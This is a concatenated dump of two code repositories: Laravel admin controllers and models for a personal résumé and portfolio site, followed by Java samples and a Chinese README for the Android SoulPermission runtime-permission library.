* Store a newly created status in storage.
*
* @param CreateStatusRequest|Request $request
*/
public function store(CreateStatusRequest $request)
{
Status::create($request->all());
return redirect()->route(config('quickadmin.route').'.status.index');
}
/**
* Show the form for editing the specified status.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$status = Status::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
$icon = Status::$icon;
return view('admin.status.edit', compact('status', "user", "icon"));
}
/**
* Update the specified status in storage.
* @param UpdateStatusRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateStatusRequest $request)
{
$status = Status::findOrFail($id);
$status->update($request->all());
return redirect()->route(config('quickadmin.route').'.status.index');
}
/**
* Remove the specified status from storage.
*
* @param int $id
*/
public function destroy($id)
{
Status::destroy($id);
return redirect()->route(config('quickadmin.route').'.status.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Status::destroy($toDelete);
} else {
Status::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.status.index');
}
}
<file_sep><?php
namespace App;
use Illuminate\Database\Eloquent\Model;
use Laraveldaily\Quickadmin\Observers\UserActionsObserver;
class Portfolio1 extends Model {
protected $table = 'portfolio1';
protected $fillable = [
'catportfolio_id',
'title',
'desc',
'pict',
'detpict',
'complete',
'client',
'isi',
'url'
];
public static function boot()
{
parent::boot();
Portfolio1::observe(new UserActionsObserver);
}
public function catportfolio()
{
return $this->hasOne('App\Catportfolio', 'id', 'catportfolio_id');
}
}<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Social;
use App\Http\Requests\CreateSocialRequest;
use App\Http\Requests\UpdateSocialRequest;
use Illuminate\Http\Request;
use App\User;
class SocialController extends Controller {
/**
* Display a listing of social
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$social = Social::with("user")->get();
return view('admin.social.index', compact('social'));
}
/**
* Show the form for creating a new social
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.social.create', compact("user"));
}
/**
* Store a newly created social in storage.
*
* @param CreateSocialRequest|Request $request
*/
public function store(CreateSocialRequest $request)
{
Social::create($request->all());
return redirect()->route(config('quickadmin.route').'.social.index');
}
/**
* Show the form for editing the specified social.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$social = Social::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.social.edit', compact('social', "user"));
}
/**
* Update the specified social in storage.
* @param UpdateSocialRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateSocialRequest $request)
{
$social = Social::findOrFail($id);
$social->update($request->all());
return redirect()->route(config('quickadmin.route').'.social.index');
}
/**
* Remove the specified social from storage.
*
* @param int $id
*/
public function destroy($id)
{
Social::destroy($id);
return redirect()->route(config('quickadmin.route').'.social.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Social::destroy($toDelete);
} else {
Social::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.social.index');
}
}
<file_sep><?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Http\Requests;
use App\Work;
use App\Education;
use App\Skillpro;
use App\Skilladd;
use App\Skilllang;
use App\Knowledge;
use App\Hobby;
use App\Experience;
class ResumeController extends Controller
{
/**
* Display a listing of the resource.
*
* @return \Illuminate\Http\Response
*/
public function index()
{
//
$exp = Experience::find(1);
$hobi = Hobby::All();
$know = Knowledge::All();
$skl = Skilllang::All();
$ska = Skilladd::All();
$skp = Skillpro::All();
$edu = Education::All()->sortByDesc("id");
$work = Work::All()->sortByDesc("id");
$title = "Resume";
return view('front-end.resume',compact('work','edu','skp','ska','skl','know','hobi'))->with('title',$title)->with('exp',$exp);
}
/**
* Show the form for creating a new resource.
*
* @return \Illuminate\Http\Response
*/
public function create()
{
//
}
/**
* Store a newly created resource in storage.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function store(Request $request)
{
//
}
/**
* Display the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function show($id)
{
//
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function edit($id)
{
//
}
/**
* Update the specified resource in storage.
*
* @param \Illuminate\Http\Request $request
* @param int $id
* @return \Illuminate\Http\Response
*/
public function update(Request $request, $id)
{
//
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function destroy($id)
{
//
}
}
<file_sep><?php
namespace App;
use Illuminate\Database\Eloquent\Model;
use Laraveldaily\Quickadmin\Observers\UserActionsObserver;
class Profile extends Model {
protected $table = 'profile';
protected $fillable = [
'user_id',
'address',
'phone',
'website',
'photo',
'about'
];
public static function boot()
{
parent::boot();
Profile::observe(new UserActionsObserver);
}
public function user()
{
return $this->hasOne('App\User', 'id', 'user_id');
}
}<file_sep><?php
namespace App;
use Illuminate\Database\Eloquent\Model;
use Laraveldaily\Quickadmin\Observers\UserActionsObserver;
class Hobby extends Model {
protected $table = 'hobby';
protected $fillable = [
'user_id',
'icon',
'detail'
];
public static function boot()
{
parent::boot();
Hobby::observe(new UserActionsObserver);
}
public function user()
{
return $this->hasOne('App\User', 'id', 'user_id');
}
}<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Portfolio1;
use App\Http\Requests\CreatePortfolio1Request;
use App\Http\Requests\UpdatePortfolio1Request;
use Illuminate\Http\Request;
use App\Http\Controllers\Traits\FileUploadTrait;
use App\Catportfolio;
class Portfolio1Controller extends Controller {
/**
* Display a listing of portfolio1
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$portfolio1 = Portfolio1::with("catportfolio")->get();
return view('admin.portfolio1.index', compact('portfolio1'));
}
/**
* Show the form for creating a new portfolio1
*
* @return \Illuminate\View\View
*/
public function create()
{
$catportfolio = Catportfolio::pluck("id", "id")->prepend('Please select', null);
return view('admin.portfolio1.create', compact("catportfolio"));
}
/**
* Store a newly created portfolio1 in storage.
*
* @param CreatePortfolio1Request|Request $request
*/
public function store(CreatePortfolio1Request $request)
{
$request = $this->saveFiles($request);
Portfolio1::create($request->all());
return redirect()->route(config('quickadmin.route').'.portfolio1.index');
}
/**
* Show the form for editing the specified portfolio1.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$portfolio1 = Portfolio1::find($id);
$catportfolio = Catportfolio::pluck("id", "id")->prepend('Please select', null);
return view('admin.portfolio1.edit', compact('portfolio1', "catportfolio"));
}
/**
* Update the specified portfolio1 in storage.
* @param UpdatePortfolio1Request|Request $request
*
* @param int $id
*/
public function update($id, UpdatePortfolio1Request $request)
{
$portfolio1 = Portfolio1::findOrFail($id);
$request = $this->saveFiles($request);
$portfolio1->update($request->all());
return redirect()->route(config('quickadmin.route').'.portfolio1.index');
}
/**
* Remove the specified portfolio1 from storage.
*
* @param int $id
*/
public function destroy($id)
{
Portfolio1::destroy($id);
return redirect()->route(config('quickadmin.route').'.portfolio1.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Portfolio1::destroy($toDelete);
} else {
Portfolio1::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.portfolio1.index');
}
}
<file_sep><?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Http\Requests;
Use App\Bcat;
Use App\Blog1;
Use App\User;
class CategoryController extends Controller
{
/**
* Display a listing of the resource.
*
* @return \Illuminate\Http\Response
*/
public function index()
{
//
abort(404);
}
/**
* Show the form for creating a new resource.
*
* @return \Illuminate\Http\Response
*/
public function create()
{
//
}
/**
* Store a newly created resource in storage.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function store(Request $request)
{
//
}
/**
* Display the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function show($id)
{
//
$blog = Blog1::with("bcat")->with("user")->where('bcat_id',$id)->get()->sortByDesc("id");
$blogsb = Blog1::with("bcat")->with("user")->get()->sortByDesc("id");
$bcat = Bcat::ALL();
$bcat1 = Bcat::find($id);
$title = $bcat1->category;
if(!$blog){
abort(404);
}
return view('front-end.blog',compact('bcat','blog','blogsb'))->with('title',$title);
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function edit($id)
{
//
}
/**
* Update the specified resource in storage.
*
* @param \Illuminate\Http\Request $request
* @param int $id
* @return \Illuminate\Http\Response
*/
public function update(Request $request, $id)
{
//
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function destroy($id)
{
//
}
}
<file_sep># fajarsuryanto.com
Source for my personal website using [Laravel 5.3](http://laravel.com/docs/5.3/).
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Knowledge;
use App\Http\Requests\CreateKnowledgeRequest;
use App\Http\Requests\UpdateKnowledgeRequest;
use Illuminate\Http\Request;
use App\User;
class KnowledgeController extends Controller {
/**
* Display a listing of knowledge
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$knowledge = Knowledge::with("user")->get();
return view('admin.knowledge.index', compact('knowledge'));
}
/**
* Show the form for creating a new knowledge
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.knowledge.create', compact("user"));
}
/**
* Store a newly created knowledge in storage.
*
* @param CreateKnowledgeRequest|Request $request
*/
public function store(CreateKnowledgeRequest $request)
{
Knowledge::create($request->all());
return redirect()->route(config('quickadmin.route').'.knowledge.index');
}
/**
* Show the form for editing the specified knowledge.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$knowledge = Knowledge::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.knowledge.edit', compact('knowledge', "user"));
}
/**
* Update the specified knowledge in storage.
* @param UpdateKnowledgeRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateKnowledgeRequest $request)
{
$knowledge = Knowledge::findOrFail($id);
$knowledge->update($request->all());
return redirect()->route(config('quickadmin.route').'.knowledge.index');
}
/**
* Remove the specified knowledge from storage.
*
* @param int $id
*/
public function destroy($id)
{
Knowledge::destroy($id);
return redirect()->route(config('quickadmin.route').'.knowledge.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Knowledge::destroy($toDelete);
} else {
Knowledge::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.knowledge.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Profile;
use App\Http\Requests\CreateProfileRequest;
use App\Http\Requests\UpdateProfileRequest;
use Illuminate\Http\Request;
use App\Http\Controllers\Traits\FileUploadTrait;
use App\User;
class ProfileController extends Controller {
/**
* Display a listing of profile
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$profile = Profile::with("user")->get();
return view('admin.profile.index', compact('profile'));
}
/**
* Show the form for creating a new profile
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.profile.create', compact("user"));
}
/**
* Store a newly created profile in storage.
*
* @param CreateProfileRequest|Request $request
*/
public function store(CreateProfileRequest $request)
{
$request = $this->saveFiles($request);
Profile::create($request->all());
return redirect()->route(config('quickadmin.route').'.profile.index');
}
/**
* Show the form for editing the specified profile.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$profile = Profile::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.profile.edit', compact('profile', "user"));
}
/**
* Update the specified profile in storage.
* @param UpdateProfileRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateProfileRequest $request)
{
$profile = Profile::findOrFail($id);
$request = $this->saveFiles($request);
$profile->update($request->all());
return redirect()->route(config('quickadmin.route').'.profile.index');
}
/**
* Remove the specified profile from storage.
*
* @param int $id
*/
public function destroy($id)
{
Profile::destroy($id);
return redirect()->route(config('quickadmin.route').'.profile.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Profile::destroy($toDelete);
} else {
Profile::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.profile.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Skillpro;
use App\Http\Requests\CreateSkillproRequest;
use App\Http\Requests\UpdateSkillproRequest;
use Illuminate\Http\Request;
use App\User;
class SkillproController extends Controller {
/**
* Display a listing of skillpro
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$skillpro = Skillpro::with("user")->get();
return view('admin.skillpro.index', compact('skillpro'));
}
/**
* Show the form for creating a new skillpro
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.skillpro.create', compact("user"));
}
/**
* Store a newly created skillpro in storage.
*
* @param CreateSkillproRequest|Request $request
*/
public function store(CreateSkillproRequest $request)
{
Skillpro::create($request->all());
return redirect()->route(config('quickadmin.route').'.skillpro.index');
}
/**
* Show the form for editing the specified skillpro.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$skillpro = Skillpro::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.skillpro.edit', compact('skillpro', "user"));
}
/**
* Update the specified skillpro in storage.
* @param UpdateSkillproRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateSkillproRequest $request)
{
$skillpro = Skillpro::findOrFail($id);
$skillpro->update($request->all());
return redirect()->route(config('quickadmin.route').'.skillpro.index');
}
/**
* Remove the specified skillpro from storage.
*
* @param int $id
*/
public function destroy($id)
{
Skillpro::destroy($id);
return redirect()->route(config('quickadmin.route').'.skillpro.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Skillpro::destroy($toDelete);
} else {
Skillpro::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.skillpro.index');
}
}
<file_sep><?php
namespace App\Http\Controllers\Admin;
use App\Http\Controllers\Controller;
use Redirect;
use Schema;
use App\Experience;
use App\Http\Requests\CreateExperienceRequest;
use App\Http\Requests\UpdateExperienceRequest;
use Illuminate\Http\Request;
use App\User;
class ExperienceController extends Controller {
/**
* Display a listing of experience
*
* @param Request $request
*
* @return \Illuminate\View\View
*/
public function index(Request $request)
{
$experience = Experience::with("user")->get();
return view('admin.experience.index', compact('experience'));
}
/**
* Show the form for creating a new experience
*
* @return \Illuminate\View\View
*/
public function create()
{
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.experience.create', compact("user"));
}
/**
* Store a newly created experience in storage.
*
* @param CreateExperienceRequest|Request $request
*/
public function store(CreateExperienceRequest $request)
{
Experience::create($request->all());
return redirect()->route(config('quickadmin.route').'.experience.index');
}
/**
* Show the form for editing the specified experience.
*
* @param int $id
* @return \Illuminate\View\View
*/
public function edit($id)
{
$experience = Experience::find($id);
$user = User::pluck("id", "id")->prepend('Please select', null);
return view('admin.experience.edit', compact('experience', "user"));
}
/**
* Update the specified experience in storage.
* @param UpdateExperienceRequest|Request $request
*
* @param int $id
*/
public function update($id, UpdateExperienceRequest $request)
{
$experience = Experience::findOrFail($id);
$experience->update($request->all());
return redirect()->route(config('quickadmin.route').'.experience.index');
}
/**
* Remove the specified experience from storage.
*
* @param int $id
*/
public function destroy($id)
{
Experience::destroy($id);
return redirect()->route(config('quickadmin.route').'.experience.index');
}
/**
* Mass delete function from index page
* @param Request $request
*
* @return mixed
*/
public function massDelete(Request $request)
{
if ($request->get('toDelete') != 'mass') {
$toDelete = json_decode($request->get('toDelete'));
Experience::destroy($toDelete);
} else {
Experience::whereNotNull('id')->delete();
}
return redirect()->route(config('quickadmin.route').'.experience.index');
}
}
<file_sep><?php
namespace App;
use Illuminate\Database\Eloquent\Model;
use Laraveldaily\Quickadmin\Observers\UserActionsObserver;
class Skilllang extends Model {
protected $table = 'skilllang';
protected $fillable = [
'user_id',
'skill',
'skill_range'
];
public static $skill_range = ["1" => "1", "2" => "2", "3" => "3", "4" => "4", "5" => "5"];
public static function boot()
{
parent::boot();
Skilllang::observe(new UserActionsObserver);
}
public function user()
{
return $this->hasOne('App\User', 'id', 'user_id');
}
}
|
2747a9967c0724d38bcf71fd6d374221d5fe4b91
|
[
"Markdown",
"PHP"
] | 23
|
PHP
|
fajars87/fajarsuryanto.com
|
1585c9b6b9640cbc9c2e33638a3ef9433d62bd8c
|
268e02e9ca1cc40ea3c01a5a209fd96806fe12c9
|
refs/heads/master
|
<file_sep>package com.qw.sample.utils;
import android.Manifest;
import android.annotation.SuppressLint;
import android.app.Activity;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.provider.ContactsContract;
import android.telephony.TelephonyManager;
import android.widget.Toast;
import com.qw.sample.adapter.CheckPermissionAdapter;
import com.qw.sample.adapter.CheckPermissionWithRationaleAdapter;
import com.qw.soul.permission.SoulPermission;
import com.qw.soul.permission.bean.Permission;
/**
* @author cd5160866
*/
public class UtilsWithPermission {
/**
* 拨打指定电话
*/
public static void makeCall(final Context context, final String phoneNumber) {
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.CALL_PHONE,
new CheckPermissionWithRationaleAdapter("如果你拒绝了权限,你将无法拨打电话,请点击授予权限",
new Runnable() {
@Override
public void run() {
//retry
makeCall(context, phoneNumber);
}
}) {
@SuppressLint("MissingPermission")
@Override
public void onPermissionOk(Permission permission) {
Intent intent = new Intent(Intent.ACTION_CALL);
Uri data = Uri.parse("tel:" + phoneNumber);
intent.setData(data);
if (!(context instanceof Activity)) {
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
}
context.startActivity(intent);
}
});
}
/**
* 选择联系人
*/
public static void chooseContact(final Activity activity, final int requestCode) {
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.READ_CONTACTS,
new CheckPermissionAdapter() {
@SuppressLint("MissingPermission")
@Override
public void onPermissionOk(Permission permission) {
activity.startActivityForResult(new Intent(Intent.ACTION_PICK, ContactsContract.Contacts.CONTENT_URI), requestCode);
}
});
}
/**
* 读取手机状态
* 读取联系人权限和打电话是一组,只要一个授予即可无需重复请求
*/
public static void readPhoneStatus() {
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.READ_PHONE_STATE, new CheckPermissionAdapter() {
@SuppressLint("MissingPermission")
@Override
public void onPermissionOk(Permission permission) {
Context context = SoulPermission.getInstance().getContext();
TelephonyManager tm = (TelephonyManager) context.getSystemService(Context.TELEPHONY_SERVICE);
if (tm == null) {
return;
}
Toast.makeText(context, "phone " + tm.getLine1Number() + "\nime " + tm.getDeviceId() + "\nsimSerialNumber " + tm.getSimSerialNumber(), Toast.LENGTH_SHORT)
.show();
}
});
}
}
<file_sep>package com.qw.sample.adapter;
import android.app.Activity;
import android.content.DialogInterface;
import androidx.appcompat.app.AlertDialog;
import com.qw.soul.permission.SoulPermission;
import com.qw.soul.permission.bean.Permission;
import com.qw.soul.permission.callbcak.CheckRequestPermissionListener;
/**
* @author cd5160866
*/
public abstract class CheckPermissionWithRationaleAdapter implements CheckRequestPermissionListener {
private String rationaleMessage;
private Runnable retryRunnable;
/**
* @param rationaleMessage 当用户首次拒绝弹框时候,根据权限不同给用户不同的文案解释
* @param retryRunnable 用户点重新授权的runnable 即重新执行原方法
*/
public CheckPermissionWithRationaleAdapter(String rationaleMessage, Runnable retryRunnable) {
this.rationaleMessage = rationaleMessage;
this.retryRunnable = retryRunnable;
}
@Override
public void onPermissionDenied(Permission permission) {
Activity activity = SoulPermission.getInstance().getTopActivity();
if (null == activity) {
return;
}
//绿色框中的流程
//用户第一次拒绝了权限、并且没有勾选"不再提示"这个值为true,此时告诉用户为什么需要这个权限。
if (permission.shouldRationale()) {
new AlertDialog.Builder(activity)
.setTitle("提示")
.setMessage(rationaleMessage)
.setPositiveButton("授予", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialogInterface, int i) {
//用户确定以后,重新执行请求原始流程
retryRunnable.run();
}
}).create().show();
} else {
//此时请求权限会直接报未授予,需要用户手动去权限设置页,所以弹框引导用户跳转去设置页
String permissionDesc = permission.getPermissionNameDesc();
new AlertDialog.Builder(activity)
.setTitle("提示")
.setMessage(permissionDesc + "异常,请前往设置->权限管理,打开" + permissionDesc + "。")
.setPositiveButton("去设置", new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialogInterface, int i) {
//去设置页
SoulPermission.getInstance().goApplicationSettings();
}
}).create().show();
}
}
}
<file_sep>package com.qw.soul.permission.bean;
/**
* @author cd5160866
*/
public enum Special {
/**
* 通知权限
*/
NOTIFICATION,
/**
* 系统弹框
*/
SYSTEM_ALERT,
/**
* 允许安装未知权限
*/
UNKNOWN_APP_SOURCES,
/**
* 修改系统设置
*/
WRITE_SETTINGS
}
<file_sep>package com.qw.soul.permission.exception;
import java.lang.IllegalStateException;
/**
* @author cd5160866
*/
public class InitException extends IllegalStateException {
public InitException() {
super("auto init failed ,you need invoke SoulPermission.init() in your application");
}
}
<file_sep>package com.qw.soul.permission.bean;
/**
* 这个类只为了参数清晰..
*
* @author cd5160866
*/
public class Permissions {
private Permission[] permissions;
public static Permissions build(String... permissions) {
return new Permissions(permissions);
}
public static Permissions build(Permission... permissions) {
return new Permissions(permissions);
}
private Permissions() {
}
private Permissions(String[] permissions) {
this.permissions = new Permission[permissions.length];
for (int i = 0; i < permissions.length; i++) {
this.permissions[i] = Permission.getDefault(permissions[i]);
}
}
private Permissions(Permission[] permissions) {
this.permissions = permissions;
}
public Permission[] getPermissions() {
return permissions;
}
public String[] getPermissionsString() {
String[] result = new String[permissions.length];
for (int i = 0; i < permissions.length; i++) {
result[i] = permissions[i].permissionName;
}
return result;
}
}
<file_sep>package com.qw.sample.guide;
import android.graphics.Color;
import android.os.Bundle;
import androidx.fragment.app.FragmentManager;
import androidx.fragment.app.FragmentPagerAdapter;
import androidx.fragment.app.FragmentStatePagerAdapter;
import androidx.viewpager.widget.ViewPager;
import androidx.appcompat.app.AppCompatActivity;
import android.view.View;
import com.qw.sample.R;
import com.qw.sample.guide.fragment.PagerItemFragment;
import java.util.Arrays;
import java.util.List;
public class WithPagerFragmentActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_with_fragment);
findViewById(R.id.FragmentPagerAdapter).setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ViewPager viewPager = findViewById(R.id.vp);
viewPager.setAdapter(new MyFragmentAdapter(getSupportFragmentManager()));
}
});
findViewById(R.id.FragmentStatePagerAdapter).setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
ViewPager viewPager = findViewById(R.id.vp);
viewPager.setAdapter(new MyFragmentStateAdapter(getSupportFragmentManager()));
}
});
}
class MyFragmentStateAdapter extends FragmentStatePagerAdapter {
private final static int TAB_COUNT = 3;
private List<Integer> listData = Arrays.asList(Color.RED, Color.GREEN, Color.BLUE);
MyFragmentStateAdapter(FragmentManager fm) {
super(fm);
}
@Override
public PagerItemFragment getItem(int position) {
return PagerItemFragment.get(listData.get(position));
}
@Override
public int getCount() {
return TAB_COUNT;
}
}
class MyFragmentAdapter extends FragmentPagerAdapter {
private final static int TAB_COUNT = 3;
private List<Integer> listData = Arrays.asList(Color.RED, Color.GREEN, Color.BLUE);
MyFragmentAdapter(FragmentManager fm) {
super(fm);
}
@Override
public PagerItemFragment getItem(int position) {
return PagerItemFragment.get(listData.get(position));
}
@Override
public int getCount() {
return TAB_COUNT;
}
}
}
<file_sep>package com.qw.sample;
import android.content.Intent;
import android.os.Bundle;
import androidx.annotation.Nullable;
import androidx.appcompat.app.AppCompatActivity;
import android.view.View;
import android.widget.Toast;
import com.qw.sample.utils.Utils;
import com.qw.sample.utils.UtilsWithPermission;
public class AfterActivity extends AppCompatActivity {
private static final int REQUEST_CODE_CONTACT = 1;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_example);
findViewById(R.id.bt_call).setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
UtilsWithPermission.makeCall(AfterActivity.this, "10086");
// makeCall();
}
});
findViewById(R.id.bt_choose_contact).setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
chooseContact();
}
});
findViewById(R.id.bt_read_phone_status).setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
UtilsWithPermission.readPhoneStatus();
}
});
}
// public void makeCall() {
// SoulPermission.getInstance()
// .checkAndRequestPermission(Manifest.permission.CALL_PHONE, new CheckRequestPermissionListener() {
// @Override
// public void onPermissionOk(Permission permission) {
// Utils.makeCall(AfterActivity.this, "10086");
// }
//
// @Override
// public void onPermissionDenied(Permission permission) {
// //绿色框中的流程
// //用户第一次拒绝了权限,没有勾选"不再提示。"这个值为true,此时告诉用户为什么需要这个权限。
// if (permission.shouldRationale) {
// new AlertDialog.Builder(AfterActivity.this)
// .setTitle("提示")
// .setMessage("如果你拒绝了权限,你将无法拨打电话,请点击授予权限")
// .setPositiveButton("授予", new DialogInterface.OnClickListener() {
// @Override
// public void onClick(DialogInterface dialogInterface, int i) {
// //用户确定以后,重新执行请求原始流程
// makeCall();
// }
// }).create().show();
// } else {
// Toast.makeText(AfterActivity.this, "本次拨打电话授权失败,请手动去设置页打开权限,或者重试授权权限", Toast.LENGTH_SHORT).show();
// }
// }
// });
// }
public void chooseContact() {
UtilsWithPermission.chooseContact(AfterActivity.this, REQUEST_CODE_CONTACT);
}
@Override
protected void onActivityResult(int requestCode, int resultCode, @Nullable final Intent data) {
super.onActivityResult(requestCode, resultCode, data);
if (resultCode == RESULT_OK) {
switch (requestCode) {
case REQUEST_CODE_CONTACT:
Utils.onGetChooseContactData(AfterActivity.this, data, new Utils.ReadContactListener() {
@Override
public void onSuccess(Utils.ContactInfo contactInfo) {
Toast.makeText(AfterActivity.this, contactInfo.toString(), Toast.LENGTH_SHORT).show();
}
@Override
public void onFailed() {
}
});
break;
default:
break;
}
}
}
}
<file_sep>include ':soulpermission', ':sample'
<file_sep># SoulPermission
[](https://bintray.com/beta/#/soulqw/maven/soulpermission?tab=overview)
[]()
[](https://www.apache.org/licenses/LICENSE-2.0)
#### Android权限适配的更优解决方案:
- 方法级权限适配、解耦Activity和Fragment、不再需要Context、不再需要onPermissionResult
- 内部涵盖版本判断,一行代码解决权限相关操作,无需在调用业务方写权限适配代码,继而实现真正调用时请求的“真运行时权限”
- 接入成本低,代码改动极小,零入侵,仅需要在gradle配置一行代码
- 支持多项权限同时请求
- 支持特殊权限(Notification[通知]、SystemAlert[应用悬浮窗]、UNKNOW_SOURCE[未知来源应用安装]、WRITE_SYS_SETTINGS[写入系统设置])的检查与请求
- 支持系统权限页面跳转
- 支持debug模式
## Installation:
```gradle
dependencies {
implementation 'com.github.soulqw:SoulPermission:1.3.1'
}
```
如果你的应用还没有适配Android X:
```gradle
dependencies {
implementation 'com.qw:soulpermission:1.2.2'
}
```
- 1.2.2即为支持support28的最后版本,后续不再维护,新功能只会在1.3.0基础上迭代(代码分支 master_old)
- 后期Jcenter 库将无法正常下载,建议尽快迁移到AndroidX,可享受最新的更新
## Usage:
#### 基本用法:
- 一句话版本完成自动判断、权限检查、请求、后续操作:
```java
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.ACCESS_FINE_LOCATION,
//if you want do noting or no need all the callbacks you may use SimplePermissionAdapter instead
new CheckRequestPermissionListener() {
@Override
public void onPermissionOk(Permission permission) {
Toast.makeText(ApiGuideActivity.this, permission.toString() +
"\n is ok , you can do your operations", Toast.LENGTH_SHORT).show();
}
@Override
public void onPermissionDenied(Permission permission) {
Toast.makeText(ApiGuideActivity.this, permission.toString() +
" \n is refused you can not do next things", Toast.LENGTH_SHORT).show();
}
});
```
- 也可以一次请求多项权限
```java
SoulPermission.getInstance().checkAndRequestPermissions(
Permissions.build(Manifest.permission.CAMERA, Manifest.permission.WRITE_EXTERNAL_STORAGE),
//if you want do noting or no need all the callbacks you may use SimplePermissionsAdapter instead
new CheckRequestPermissionsListener() {
@Override
public void onAllPermissionOk(Permission[] allPermissions) {
Toast.makeText(ApiGuideActivity.this, allPermissions.length + "permissions is ok" +
" \n you can do your operations", Toast.LENGTH_SHORT).show();
}
@Override
public void onPermissionDenied(Permission[] refusedPermissions) {
Toast.makeText(ApiGuideActivity.this, refusedPermissions[0].toString() +
" \n is refused you can not do next things", Toast.LENGTH_SHORT).show();
}
});
```
- 包含shouldShowRequestPermissionRationale的情形
```java
SoulPermission.getInstance().checkAndRequestPermission(Manifest.permission.READ_CONTACTS,
new CheckRequestPermissionListener() {
@Override
public void onPermissionOk(Permission permission) {
